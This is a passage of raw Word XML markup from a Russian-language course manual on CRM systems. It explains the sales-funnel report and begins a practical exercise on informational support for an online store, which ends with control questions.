        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся изображения этапов создания статистического отчета в CRM системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зайти в CRM систему используя свой логин.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перейти в меню отчетности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00B05EC8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Аналитика в CRM системах представлена сложными алгоритмами анализа статистических данных и примерным прогнозированием на их основе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">На странице </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Воронка продаж</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> представлено количественное соотношение всех сделок на разных стадиях в графическом и табличном виде. Наименование стадий и порядок их следования можно задать на странице </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройки -&gt; Справочники -&gt; Стадии сделки</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Стадии сделки также являются координатными точками для построения собственно воронки продаж.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На странице выведены таблицы и диаграммы двух видов сделок: тех, которые находятся на каком-либо этапе заключения и тех, которые завершились неудачей:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1809085" cy="1447200"/>
            <wp:effectExtent l="19050" t="0" r="665" b="0"/>
            <wp:docPr id="25329" name="Рисунок 25329" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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29" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image173.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId507" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1813927" cy="1451073"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В таблице </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сделки в работе</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> каждый нижележащий тип сделок включает в себя все те, что расположены выше, т.е. условно говоря считается, что сделка на стадии </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сделка заключена</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> прошла все предыдущие этапы и включена в них при подсчете статистики.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В диаграмму незаключенных сделок попадают все сделки, находящиеся на стадии </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сделка не заключена</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обработка приостановлена</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройки -&gt; Справочники -&gt; Стадии сделки</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Полное количество сделок получится, если сложить все сделки, прошедшие обработку (80%), и незаключенные сделки (20%).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1% может теряться в результате остатка от деления.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Остановимся подробнее на том, как формируется воронка продаж.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Например, рассмотрим стадию </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Переговоры в процессе</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. 60% показывает, какой процент сделок от общего числа были или находятся на этой стадии. Т.е. 60% всех сделок завершили стадии </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В обработке</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Уточнение информации</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Цифра 6 указывает фактическое количество таких сделок. Высота цветной полоски визуально отображает количественное соотношение сделок на данной стадии по сравнению с другими, а в колонке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сумма</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> написана общая сумма таких сделок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> вы можете изменить логику построения воронки продаж, чтобы каждая нижележащая стадия не включала в себя предыдущие. Для этого измените вид воронки на классический:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1140150" cy="539452"/>
            <wp:effectExtent l="19050" t="0" r="2850" b="0"/>
            <wp:docPr id="25330" name="Рисунок 25330" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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0" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image174.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId508" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1141791" cy="540228"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое отчет?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Что такое аналитический отчет?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие виды отчетов вы знаете?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00617AC0" w:rsidRDefault="00DB3FFC" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="233" w:name="_Toc507788283"/>
      <w:bookmarkStart w:id="234" w:name="_Toc507788558"/>
      <w:bookmarkStart w:id="235" w:name="_Toc26278757"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № </w:t>
      </w:r>
      <w:r w:rsidR="0079051C" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>38</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Реализация информационной поддержки интернет-магазина компании</w:t>
      </w:r>
      <w:bookmarkEnd w:id="233"/>
      <w:bookmarkEnd w:id="234"/>
      <w:bookmarkEnd w:id="235"/>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков поддержки интернет ресурса. Разработка алгоритма информационной поддержки управления и деятельности интернет-магазина программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">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7363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Провести анализ работы электронной торговой площадки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся результаты анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D565C2" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
      <w:r w:rsidR="00D565C2" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проанализировать работу электронной торговой площадки согласно указаниям из теоретической части.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="007650F3" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Информационная поддержка сайтов является неотъемлемой частью всего комплекса мероприятий по поддержке ресурса.</w:t>
      </w:r>
      <w:r w:rsidR="00D565C2" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Успешная работа веб-ресурса и актуальный контент - вещи взаимосвязанные. Чтобы интернет-проект постоянно вызывал интерес у целевой аудитории, привлекал все большее число пользователей, постоянно обновлять информацию просто необходимо! Что подразумевается под этим понятием - информация? Это могут быть новости о деятельности компании, об акциях, данные о ценах, фотографии. Интересный в этом отношении сайт будет занимать более высокие позиции в выдаче поисковых систем, а значит, станет более востребованным среди целевой аудитории.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Что входит в понятие информационной поддержки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Своевременное обновление информации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Такие разделы, как новостная лента, каталог, фотогалерея, стоимость товаров и услуг требуют постоянного внимания. Как только в компании произошло какое-то событие (например, вы приняли участие в международной выставке товаров и услуг), изменились цены, расширился ассортимент - об этом сразу надо сообщать, то есть размещать информацию на сайте. Наши специалисты сделают эту работу быстро и качественно, сэкономив ваше время.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Подготовка материалов к размещению на сайте</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Прежде чем разместить материалы на сайте, их необходимо подготовить: отредактировать, адаптировать по требованиям экранной типографики. Тексты должны иметь высокую ревалентность (соответствовать поисковому запросу), быть содержательными и привлекательными. Графические материалы (фотографии, диаграммы, чертежи и прочее) также часто требуют доработки. Так, может возникнуть необходимость в изменении формата, размера изображения. Специалисты нашей фирмы подготовят и размесят все материалы с учетом требований поискового продвижения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Создание дополнительных страниц</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Структуру контента необходимо регулярно обновлять: добавлять новые страницы или заниматься редактированием существующих. При условии несовершенной работы системы управления CMS или ее отсутствия заниматься такой работой проблематично. Мы решим эти проблемы и поможем насытить сайт актуальной информацией.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Своевременно размещенная информация о работе компании, ценах, акциях станет залогом хорошего имиджа, поможет привлечь посетителей - потенциальных заказчиков. Информационная поддержка поможет сделать ваш сайт актуальным и более привлекательным для пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что понимается под понятием информационной поддержки?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
